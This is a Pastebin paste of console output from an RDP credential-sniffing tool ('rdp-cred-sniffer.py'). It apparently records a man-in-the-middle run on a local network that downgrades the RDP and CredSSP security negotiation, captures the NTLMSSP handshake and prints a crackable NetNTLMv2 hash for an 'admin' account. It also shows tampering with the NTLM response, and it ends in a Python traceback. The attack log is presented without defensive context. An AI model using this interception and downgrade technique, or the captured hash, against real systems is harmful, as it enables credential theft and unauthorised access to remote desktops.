API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 15th, 2017
74
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.96 KB | None | 0 0
raw download clone embed print report
  1. Waiting for connection
  2. Connection received from 192.168.1.144
  3. From client:
  4. 00000000: 03 00 00 2B 26 E0 00 00 00 00 00 43 6F 6F 6B 69 ...+&......Cooki
  5. 00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 61 64 6D 69 e: mstshash=admi
  6. 00000020: 6E 0D 0A 01 00 08 00 0B 00 00 00 n..........
  7. Downgrading authentication options from 11 to 3
  8. From client: (modified)
  9. 00000000: 03 00 00 2B 26 E0 00 00 00 00 00 43 6F 6F 6B 69 ...+&......Cooki
  10. 00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 61 64 6D 69 e: mstshash=admi
  11. 00000020: 6E 0D 0A 01 00 08 00 03 00 00 00 n..........
  12. From server:
  13. 00000000: 03 00 00 13 0E D0 00 00 12 34 00 02 1F 08 00 02 .........4......
  14. 00000010: 00 00 00 ...
  15. Enable SSL
  16. From client:
  17. 00000000: 30 37 A0 03 02 01 02 A1 30 30 2E 30 2C A0 2A 04 07......00.0,.*.
  18. 00000010: 28 4E 54 4C 4D 53 53 50 00 01 00 00 00 B7 82 08 (NTLMSSP........
  19. 00000020: E2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  20. 00000030: 00 06 01 B1 1D 00 00 00 0F .........
  21. From server:
  22. 00000000: 30 82 01 02 A0 03 02 01 04 A1 81 FA 30 81 F7 30 0...........0..0
  23. 00000010: 81 F4 A0 81 F1 04 81 EE 4E 54 4C 4D 53 53 50 00 ........NTLMSSP.
  24. 00000020: 02 00 00 00 1E 00 1E 00 38 00 00 00 35 82 8A E2 ........8...5...
  25. 00000030: E2 0C 22 80 6C 9D 8C A7 00 00 00 00 00 00 00 00 ..".l...........
  26. 00000040: 98 00 98 00 56 00 00 00 0A 00 39 38 00 00 00 0F ....V.....98....
  27. 00000050: 44 00 45 00 53 00 4B 00 54 00 4F 00 50 00 2D 00 D.E.S.K.T.O.P.-.
  28. 00000060: 4A 00 56 00 51 00 30 00 32 00 4C 00 51 00 02 00 J.V.Q.0.2.L.Q...
  29. 00000070: 1E 00 44 00 45 00 53 00 4B 00 54 00 4F 00 50 00 ..D.E.S.K.T.O.P.
  30. 00000080: 2D 00 4A 00 56 00 51 00 30 00 32 00 4C 00 51 00 -.J.V.Q.0.2.L.Q.
  31. 00000090: 01 00 1E 00 44 00 45 00 53 00 4B 00 54 00 4F 00 ....D.E.S.K.T.O.
  32. 000000A0: 50 00 2D 00 4A 00 56 00 51 00 30 00 32 00 4C 00 P.-.J.V.Q.0.2.L.
  33. 000000B0: 51 00 04 00 1E 00 44 00 45 00 53 00 4B 00 54 00 Q.....D.E.S.K.T.
  34. 000000C0: 4F 00 50 00 2D 00 4A 00 56 00 51 00 30 00 32 00 O.P.-.J.V.Q.0.2.
  35. 000000D0: 4C 00 51 00 03 00 1E 00 44 00 45 00 53 00 4B 00 L.Q.....D.E.S.K.
  36. 000000E0: 54 00 4F 00 50 00 2D 00 4A 00 56 00 51 00 30 00 T.O.P.-.J.V.Q.0.
  37. 000000F0: 32 00 4C 00 51 00 07 00 08 00 91 62 FF 06 49 B6 2.L.Q......b..I.
  38. 00000100: D2 01 00 00 00 00 ......
  39. Server challenge: e20c22806c9d8ca7
  40. From client:
  41. 00000000: 30 82 03 33 A0 03 02 01 02 A1 82 02 04 30 82 02 0..3.........0..
  42. 00000010: 00 30 82 01 FC A0 82 01 F8 04 82 01 F4 4E 54 4C .0...........NTL
  43. 00000020: 4D 53 53 50 00 03 00 00 00 18 00 18 00 82 00 00 MSSP............
  44. 00000030: 00 4A 01 4A 01 9A 00 00 00 10 00 10 00 58 00 00 .J.J.........X..
  45. 00000040: 00 0A 00 0A 00 68 00 00 00 10 00 10 00 72 00 00 .....h.......r..
  46. 00000050: 00 10 00 10 00 E4 01 00 00 35 82 88 E2 06 01 B1 .........5......
  47. 00000060: 1D 00 00 00 0F 81 0B 80 AD C8 DB 61 FD 32 FD 2C ...........a.2.,
  48. 00000070: DB C6 5B ED 27 61 00 64 00 6D 00 69 00 6E 00 2D ..[.'a.d.m.i.n.-
  49. 00000080: 00 50 00 43 00 61 00 64 00 6D 00 69 00 6E 00 41 .P.C.a.d.m.i.n.A
  50. 00000090: 00 44 00 4D 00 49 00 4E 00 2D 00 50 00 43 00 00 .D.M.I.N.-.P.C..
  51. 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  52. 000000B0: 00 00 00 00 00 00 00 05 39 D1 E9 D0 A0 D6 DF AA ........9.......
  53. 000000C0: 48 CB 00 80 63 D1 DA 01 01 00 00 00 00 00 00 91 H...c...........
  54. 000000D0: 62 FF 06 49 B6 D2 01 B3 04 08 61 71 AC 50 7A 00 b..I......aq.Pz.
  55. 000000E0: 00 00 00 02 00 1E 00 44 00 45 00 53 00 4B 00 54 .......D.E.S.K.T
  56. 000000F0: 00 4F 00 50 00 2D 00 4A 00 56 00 51 00 30 00 32 .O.P.-.J.V.Q.0.2
  57. 00000100: 00 4C 00 51 00 01 00 1E 00 44 00 45 00 53 00 4B .L.Q.....D.E.S.K
  58. 00000110: 00 54 00 4F 00 50 00 2D 00 4A 00 56 00 51 00 30 .T.O.P.-.J.V.Q.0
  59. 00000120: 00 32 00 4C 00 51 00 04 00 1E 00 44 00 45 00 53 .2.L.Q.....D.E.S
  60. 00000130: 00 4B 00 54 00 4F 00 50 00 2D 00 4A 00 56 00 51 .K.T.O.P.-.J.V.Q
  61. 00000140: 00 30 00 32 00 4C 00 51 00 03 00 1E 00 44 00 45 .0.2.L.Q.....D.E
  62. 00000150: 00 53 00 4B 00 54 00 4F 00 50 00 2D 00 4A 00 56 .S.K.T.O.P.-.J.V
  63. 00000160: 00 51 00 30 00 32 00 4C 00 51 00 07 00 08 00 91 .Q.0.2.L.Q......
  64. 00000170: 62 FF 06 49 B6 D2 01 06 00 04 00 02 00 00 00 08 b..I............
  65. 00000180: 00 30 00 30 00 00 00 00 00 00 00 01 00 00 00 00 .0.0............
  66. 00000190: 20 00 00 BE 21 25 20 D5 0F 93 8F 8F 25 DC D5 A3 ...!% .....%...
  67. 000001A0: 36 CB CD 22 64 C0 F8 BB BF 89 04 B7 7B 53 C9 37 6.."d.......{S.7
  68. 000001B0: A4 8C F9 0A 00 10 00 00 00 00 00 00 00 00 00 00 ................
  69. 000001C0: 00 00 00 00 00 00 00 09 00 2A 00 54 00 45 00 52 .........*.T.E.R
  70. 000001D0: 00 4D 00 53 00 52 00 56 00 2F 00 31 00 39 00 32 .M.S.R.V./.1.9.2
  71. 000001E0: 00 2E 00 31 00 36 00 38 00 2E 00 31 00 2E 00 31 ...1.6.8...1...1
  72. 000001F0: 00 32 00 38 00 00 00 00 00 00 00 00 00 00 00 00 .2.8............
  73. 00000200: 00 48 5A 83 93 D2 A4 C5 B2 A5 15 01 62 6E 9C 1B .HZ.........bn..
  74. 00000210: F0 A3 82 01 22 04 82 01 1E 01 00 00 00 E9 A4 42 ...."..........B
  75. 00000220: 96 9F 72 9B 6D 00 00 00 00 DC AF C7 C1 F3 8D 15 ..r.m...........
  76. 00000230: 79 B3 25 B3 B5 4A D8 27 A9 3C 55 A0 0A C9 AC 6A y.%..J.'.<U....j
  77. 00000240: 6E CD 58 4C 5C C8 E6 96 BE CF 2D 93 0F 4E 49 28 n.XL\.....-..NI(
  78. 00000250: 8B E8 09 11 BA 36 BF DB A2 9E 53 9F 3B CE 9B 93 .....6....S.;...
  79. 00000260: 2F A4 F9 25 BF 8E 87 2A D6 F4 17 4A 9A 08 26 6E /..%...*...J..&n
  80. 00000270: A9 BA 46 67 1B 66 36 FC DB BA 5D F5 5B BA 44 53 ..Fg.f6...].[.DS
  81. 00000280: AA DB 8B C7 46 EC FB 68 C4 25 4E 15 8F 2A D4 01 ....F..h.%N..*..
  82. 00000290: B3 22 58 F2 C1 3A 76 25 06 E3 7E 17 D2 15 C7 B5 ."X..:v%..~.....
  83. 000002A0: F1 AB 48 55 DF 30 97 9A 12 6E 6D B3 59 2B 41 74 ..HU.0...nm.Y+At
  84. 000002B0: 01 7C 37 4A A8 B4 EE 87 81 1B 49 7A C5 40 C5 BD .|7J......Iz.@..
  85. 000002C0: 2B 3E C9 DC 6F 19 1F F4 A2 0E 1F C1 EA 64 3A 40 +>..o........d:@
  86. 000002D0: 71 A6 CB DE 0E 21 B1 0E DF 36 82 0D 7E C3 0A 9D q....!...6..~...
  87. 000002E0: 1D 6D B6 E1 AC 3D 74 7E BC B9 33 3F CF 8E 65 A1 .m...=t~..3?..e.
  88. 000002F0: 5A 2F C8 52 2A E0 67 7C 52 92 89 A3 07 38 67 38 Z/.R*.g|R....8g8
  89. 00000300: E8 35 46 A6 5B 5A 9E 81 FB 72 73 B1 74 93 3B 42 .5F.[Z...rs.t.;B
  90. 00000310: 5B 45 07 16 A1 B4 CF 31 48 62 12 DB BD 1F F7 6F [E.....1Hb.....o
  91. 00000320: 7A 52 5D 32 C5 51 89 8C D7 C9 9B 9C 47 86 67 73 zR]2.Q......G.gs
  92. 00000330: 77 FD BF F0 49 AA 78 w...I.x
  93. admin::admin-PC:e20c22806c9d8ca7:0539d1e9d0a0d6dfaa48cb008063d1da:01010000000000009162ff0649b6d201b304086171ac507a0000000002001e004400450053004b0054004f0050002d004a0056005100300032004c00510001001e004400450053004b0054004f0050002d004a0056005100300032004c00510004001e004400450053004b0054004f0050002d004a0056005100300032004c00510003001e004400450053004b0054004f0050002d004a0056005100300032004c005100070008009162ff0649b6d20106000400020000000800300030000000000000000100000000200000be212520d50f938f8f25dcd5a336cbcd2264c0f8bbbf8904b77b53c937a48cf90a0010000000000000000000000000000000000009002a005400450052004d005300520056002f003100390032002e003100360038002e0031002e00310032003800000000000000000000000000
  94. Tamper with NTLM response
  95. From client: (modified)
  96. 00000000: 30 82 03 33 A0 03 02 01 02 A1 82 02 04 30 82 02 0..3.........0..
  97. 00000010: 00 30 82 01 FC A0 82 01 F8 04 82 01 F4 4E 54 4C .0...........NTL
  98. 00000020: 4D 53 53 50 00 03 00 00 00 18 00 18 00 82 00 00 MSSP............
  99. 00000030: 00 4A 01 4A 01 9A 00 00 00 10 00 10 00 58 00 00 .J.J.........X..
  100. 00000040: 00 0A 00 0A 00 68 00 00 00 10 00 10 00 72 00 00 .....h.......r..
  101. 00000050: 00 10 00 10 00 E4 01 00 00 35 82 88 E2 06 01 B1 .........5......
  102. 00000060: 1D 00 00 00 0F 81 0B 80 AD C8 DB 61 FD 32 FD 2C ...........a.2.,
  103. 00000070: DB C6 5B ED 27 61 00 64 00 6D 00 69 00 6E 00 2D ..[.'a.d.m.i.n.-
  104. 00000080: 00 50 00 43 00 61 00 64 00 6D 00 69 00 6E 00 41 .P.C.a.d.m.i.n.A
  105. 00000090: 00 44 00 4D 00 49 00 4E 00 2D 00 50 00 43 00 00 .D.M.I.N.-.P.C..
  106. 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  107. 000000B0: 00 00 00 00 00 00 00 06 39 D1 E9 D0 A0 D6 DF AA ........9.......
  108. 000000C0: 48 CB 00 80 63 D1 DA 01 01 00 00 00 00 00 00 91 H...c...........
  109. 000000D0: 62 FF 06 49 B6 D2 01 B3 04 08 61 71 AC 50 7A 00 b..I......aq.Pz.
  110. 000000E0: 00 00 00 02 00 1E 00 44 00 45 00 53 00 4B 00 54 .......D.E.S.K.T
  111. 000000F0: 00 4F 00 50 00 2D 00 4A 00 56 00 51 00 30 00 32 .O.P.-.J.V.Q.0.2
  112. 00000100: 00 4C 00 51 00 01 00 1E 00 44 00 45 00 53 00 4B .L.Q.....D.E.S.K
  113. 00000110: 00 54 00 4F 00 50 00 2D 00 4A 00 56 00 51 00 30 .T.O.P.-.J.V.Q.0
  114. 00000120: 00 32 00 4C 00 51 00 04 00 1E 00 44 00 45 00 53 .2.L.Q.....D.E.S
  115. 00000130: 00 4B 00 54 00 4F 00 50 00 2D 00 4A 00 56 00 51 .K.T.O.P.-.J.V.Q
  116. 00000140: 00 30 00 32 00 4C 00 51 00 03 00 1E 00 44 00 45 .0.2.L.Q.....D.E
  117. 00000150: 00 53 00 4B 00 54 00 4F 00 50 00 2D 00 4A 00 56 .S.K.T.O.P.-.J.V
  118. 00000160: 00 51 00 30 00 32 00 4C 00 51 00 07 00 08 00 91 .Q.0.2.L.Q......
  119. 00000170: 62 FF 06 49 B6 D2 01 06 00 04 00 02 00 00 00 08 b..I............
  120. 00000180: 00 30 00 30 00 00 00 00 00 00 00 01 00 00 00 00 .0.0............
  121. 00000190: 20 00 00 BE 21 25 20 D5 0F 93 8F 8F 25 DC D5 A3 ...!% .....%...
  122. 000001A0: 36 CB CD 22 64 C0 F8 BB BF 89 04 B7 7B 53 C9 37 6.."d.......{S.7
  123. 000001B0: A4 8C F9 0A 00 10 00 00 00 00 00 00 00 00 00 00 ................
  124. 000001C0: 00 00 00 00 00 00 00 09 00 2A 00 54 00 45 00 52 .........*.T.E.R
  125. 000001D0: 00 4D 00 53 00 52 00 56 00 2F 00 31 00 39 00 32 .M.S.R.V./.1.9.2
  126. 000001E0: 00 2E 00 31 00 36 00 38 00 2E 00 31 00 2E 00 31 ...1.6.8...1...1
  127. 000001F0: 00 32 00 38 00 00 00 00 00 00 00 00 00 00 00 00 .2.8............
  128. 00000200: 00 48 5A 83 93 D2 A4 C5 B2 A5 15 01 62 6E 9C 1B .HZ.........bn..
  129. 00000210: F0 A3 82 01 22 04 82 01 1E 01 00 00 00 E9 A4 42 ...."..........B
  130. 00000220: 96 9F 72 9B 6D 00 00 00 00 DC AF C7 C1 F3 8D 15 ..r.m...........
  131. 00000230: 79 B3 25 B3 B5 4A D8 27 A9 3C 55 A0 0A C9 AC 6A y.%..J.'.<U....j
  132. 00000240: 6E CD 58 4C 5C C8 E6 96 BE CF 2D 93 0F 4E 49 28 n.XL\.....-..NI(
  133. 00000250: 8B E8 09 11 BA 36 BF DB A2 9E 53 9F 3B CE 9B 93 .....6....S.;...
  134. 00000260: 2F A4 F9 25 BF 8E 87 2A D6 F4 17 4A 9A 08 26 6E /..%...*...J..&n
  135. 00000270: A9 BA 46 67 1B 66 36 FC DB BA 5D F5 5B BA 44 53 ..Fg.f6...].[.DS
  136. 00000280: AA DB 8B C7 46 EC FB 68 C4 25 4E 15 8F 2A D4 01 ....F..h.%N..*..
  137. 00000290: B3 22 58 F2 C1 3A 76 25 06 E3 7E 17 D2 15 C7 B5 ."X..:v%..~.....
  138. 000002A0: F1 AB 48 55 DF 30 97 9A 12 6E 6D B3 59 2B 41 74 ..HU.0...nm.Y+At
  139. 000002B0: 01 7C 37 4A A8 B4 EE 87 81 1B 49 7A C5 40 C5 BD .|7J......Iz.@..
  140. 000002C0: 2B 3E C9 DC 6F 19 1F F4 A2 0E 1F C1 EA 64 3A 40 +>..o........d:@
  141. 000002D0: 71 A6 CB DE 0E 21 B1 0E DF 36 82 0D 7E C3 0A 9D q....!...6..~...
  142. 000002E0: 1D 6D B6 E1 AC 3D 74 7E BC B9 33 3F CF 8E 65 A1 .m...=t~..3?..e.
  143. 000002F0: 5A 2F C8 52 2A E0 67 7C 52 92 89 A3 07 38 67 38 Z/.R*.g|R....8g8
  144. 00000300: E8 35 46 A6 5B 5A 9E 81 FB 72 73 B1 74 93 3B 42 .5F.[Z...rs.t.;B
  145. 00000310: 5B 45 07 16 A1 B4 CF 31 48 62 12 DB BD 1F F7 6F [E.....1Hb.....o
  146. 00000320: 7A 52 5D 32 C5 51 89 8C D7 C9 9B 9C 47 86 67 73 zR]2.Q......G.gs
  147. 00000330: 77 FD BF F0 49 AA 78 w...I.x
  148. TLS alert access denied, Downgrading CredSSP
  149. Waiting for connection
  150. Connection received from 192.168.1.144
  151. From client:
  152. 00000000: 03 00 00 2B 26 E0 00 00 00 00 00 43 6F 6F 6B 69 ...+&......Cooki
  153. 00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 61 64 6D 69 e: mstshash=admi
  154. 00000020: 6E 0D 0A 01 00 08 00 01 00 00 00 n..........
  155. From server:
  156. 00000000: 03 00 00 13 0E D0 00 00 12 34 00 03 00 08 00 05 .........4......
  157. 00000010: 00 00 00 ...
  158. Enable SSL
  159. Connection lost
  160. Traceback (most recent call last):
  161. File "./rdp-cred-sniffer.py", line 800, in <module>
  162. run()
  163. File "./rdp-cred-sniffer.py", line 785, in run
  164. if not forward_data():
  165. File "./rdp-cred-sniffer.py", line 737, in forward_data
  166. readable, _, _ = select.select([local_conn, remote_socket], [], [])
  167. ValueError: file descriptor cannot be a negative integer (-1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!